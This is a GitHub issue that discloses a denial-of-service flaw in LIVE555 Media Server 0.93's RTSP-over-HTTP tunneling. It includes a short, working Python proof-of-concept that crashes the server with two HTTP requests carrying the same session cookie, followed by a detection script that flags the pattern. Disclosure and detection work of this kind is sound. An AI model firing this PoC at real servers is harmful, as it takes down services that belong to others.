There is a Denial of service attack issue that can cause the program to crash in LIVE555 Media Server version 0.93. #19

Closed
@DshtAnger

ISSUE DESCRIPTION

The project website: http://www.live555.com/liveMedia/

I found a new way to make RTSPServer crash in the latest version 0.93 when RTSP-over-HTTP tunneling is supported.

I only need to send two HTTP requests in one TCP connection.

The problem occurs in RTSPServer.cpp:853, where it calls handleHTTPCmd_TunnelingPOST.

If I first send an HTTP GET packet with a specific sessionCookie and then send an HTTP POST packet with this sessionCookie in the same TCP connection, RTSPServer will call an erroneous virtual function pointer in the readSocket function (GroupsockHelper.cpp), and the pointer value comes from the heap, which may be controllable.

Attack PoC Python code:

```python
from socket import *
target_ip = REMOTE_SERVER_IP
target_port = 554  # or 8554

tcp = socket(AF_INET,SOCK_STREAM)
tcp.connect((target_ip,target_port))

http_request_GET = '''GET / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r\n'''

http_request_POST = '''POST / HTTP/1.1\r
x-sessioncookie: AAAAABBBBBB\r
Accept: application/text\r\n\r
This is test data\r\n'''

tcp.send(http_request_GET)
data = tcp.recv(1024)

tcp.send(http_request_POST)
tcp.close()
```

You can just build a test demo according to https://github.com/rgaufman/live555 and attack the bin live555MediaServer for verification.

Original vulnerability discoverer:
许彬彬 Xubinbin

IMPACT

It will cause a DoS attack and potential remote command execution in version 0.93 (I verified), and even in all earlier versions (this is just my unverified guess).
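For detection, the condition in this report (an HTTP GET and a later HTTP POST carrying the same `x-sessioncookie` on one TCP connection) can be checked on reassembled client-to-server bytes. The following is an added example, not code from the issue or from LIVE555; the function names and sample streams are constructed. It assumes that legitimate RTSP-over-HTTP tunneling sends the GET and POST halves on separate TCP connections.

```python
import re

# Constructed sample: client-to-server bytes of ONE TCP connection, shaped like
# the two requests in the report (GET, then POST with the same cookie).
SAMPLE_SAME_CONN = (
    b"GET / HTTP/1.1\r\nx-sessioncookie: AAAAABBBBBB\r\n"
    b"Accept: application/text\r\n\r\n"
    b"POST / HTTP/1.1\r\nx-sessioncookie: AAAAABBBBBB\r\n"
    b"Accept: application/text\r\n\r\nThis is test data\r\n"
)
# Constructed sample: a connection that carries only the GET half of a tunnel.
SAMPLE_GET_ONLY = (
    b"GET /stream HTTP/1.1\r\nx-sessioncookie: c0ffee01\r\n"
    b"Accept: application/x-rtsp-tunnelled\r\n\r\n"
)

REQUEST_LINE = re.compile(rb"^(GET|POST) \S+ HTTP/1\.[01]\r?$", re.M)
COOKIE = re.compile(rb"^x-sessioncookie:[ \t]*([^\r\n]*)", re.I | re.M)


def tunnel_requests(stream):
    """Return [(method, cookie)] for each GET/POST that has an x-sessioncookie."""
    found = []
    starts = [m.start() for m in REQUEST_LINE.finditer(stream)]
    for begin, end in zip(starts, starts[1:] + [len(stream)]):
        # Only the header block (up to the first blank line) is inspected.
        head = re.split(rb"\r?\n\r?\n", stream[begin:end], maxsplit=1)[0]
        cookie = COOKIE.search(head)
        if cookie:
            method = head.split(b" ", 1)[0].decode()
            found.append((method, cookie.group(1).strip().decode("latin-1")))
    return found


def same_connection_tunnel_pairs(stream):
    """Cookies for which a GET is followed by a POST on this one connection."""
    get_seen, flagged = set(), []
    for method, cookie in tunnel_requests(stream):
        if method == "GET":
            get_seen.add(cookie)
        elif cookie in get_seen and cookie not in flagged:
            flagged.append(cookie)
    return flagged


if __name__ == "__main__":
    print(same_connection_tunnel_pairs(SAMPLE_SAME_CONN))
    print(same_connection_tunnel_pairs(SAMPLE_GET_ONLY))
```

A non-empty result for a connection is the signal to alert on or to drop at a proxy in front of the server.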
